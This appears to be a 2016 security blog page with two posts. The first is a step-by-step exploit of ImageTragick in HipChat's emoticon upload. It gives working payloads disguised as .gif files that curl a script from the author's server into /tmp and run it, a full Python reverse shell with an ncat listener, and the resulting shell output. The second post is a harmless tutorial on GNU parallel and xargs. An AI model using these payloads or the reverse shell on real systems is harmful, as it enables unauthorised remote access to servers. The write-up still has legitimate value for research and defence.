Tuesday, May 17, 2016

Exploiting HipChat with ImageTragick

Hipchat uses the Imagemagick library to resize your custom emoticons. If you have access to upload your own emoticon image files to the server using the web interface (or API probably), you can use the Imagetragick vulnerability to get shell on the machine.

It turns out the ImageTragick's PoC didn't work on our server:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

After quite a bit of mangling and testing, the following file contents, renamed to a .gif (HipChat doesn't accept .mvg files), will work:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";curl testserver:8000/test4")'
pop graphic-context

I could see the request for "test4" in my testserver's logs. woot. This means we have remote command execution on the server. Now all we have to do is get shell.

Now since I didn't have time to figure out how to make it a leet one-liner, I decided to break shell access into two requests. The first pulls the shell script to /tmp/ and the second executes the file.

The reverse shell I used was:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I simply pasted that into a .sh on my testserver so the victim HipChat server could pull it down

I listened on my remote box with a basic ncat listener:
ncat -l -v 1234

Then I created the two separate exploit .gif files. The first .gif runs curl to download the python shell:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";curl testserver:8000/python_shell.sh -o /tmp/python_shell.sh")'
pop graphic-context

The second .gif executes the python shell:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";bash /tmp/python_shell.sh")'
pop graphic-context

(now that I think about it, you might be able to combine both files into one to only have to upload once, but I haven't tested that)

Once you upload that second gif, about a second or two later, you should see your shell come through on your ncat 1234 port:
$ uname -a
Linux hipchat.blah.com 3.4.0-54-generic #81~precise1-Ubuntu SMP Tue Jul 15 04:02:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

So ImageTragick is kind of a big deal in that it's stupid easy to exploit (at least in this case) and it's a fairly reliable command injection vuln.

Thursday, May 12, 2016

Using Parallel Instead of For Loops

For loops are an addiction of mine, I use them all day every day. Any time you have a tool that does one thing well but doesn't support multiple inputs or inputs from a file, I use a bash for loop. Unfortunately for loops work sequentially, one after the other. Once process runs, finishes, exits, and the next process starts, finishes, exits and so on.

Many times I've come across a tool or process that just hangs, and as a result hangs all the later processes as well. In situations where I think that is likely to happen, I'll use parallel.

Ok, so lets make a for loop that resolves the MX records of google.com

for i in $(host google.com | grep 'mail is' | cut -d ' ' -f7); do printf $i:; host $i | grep 'has address' | cut -d ' ' -f4; done
alt1.aspmx.l.google.com.:74.125.192.27
alt2.aspmx.l.google.com.:74.125.141.27
aspmx.l.google.com.:209.85.147.26
alt4.aspmx.l.google.com.:209.85.203.26
alt3.aspmx.l.google.com.:64.233.190.27

Great, nothing fancy there. Now lets say for some reason one iteration of that for loop is hanging and lets pretend we are using a tool (not "host") that has ridiculous timeouts (e.g. nikto on default), wouldn't it be great to run several all at the same time in groups and as one finishes it's spot in the group the next iteration populates it's place? yeah, thats what parallel does. Let's change that for loop to use parallel instead:

host google.com | grep 'mail is' | cut -d ' ' -f7 | parallel -j 5 -I{} -r "printf {}:; host {} | grep 'has address' | cut -d ' ' -f4"
alt2.aspmx.l.google.com.:209.85.202.27
alt3.aspmx.l.google.com.:108.177.15.27
aspmx.l.google.com.:209.85.201.27
alt4.aspmx.l.google.com.:74.125.136.27
alt1.aspmx.l.google.com.:173.194.68.27

This shows you how to send piped bash commands to parallel, instead of just single processes. In this way, it functions very similarly to the classic "while read line" looping structure.

BONUS:
The same command using xargs (very similar, works on OSX & nix):
host google.com | grep 'mail is' | cut -d ' ' -f7 | xargs -I {} sh -c "printf {}:; host {} | grep 'has address' | cut -d ' ' -f4"
aspmx.l.google.com.:209.85.232.27
alt3.aspmx.l.google.com.:64.233.167.27
alt2.aspmx.l.google.com.:74.125.24.27
alt1.aspmx.l.google.com.:64.233.186.27
alt4.aspmx.l.google.com.:74.125.136.26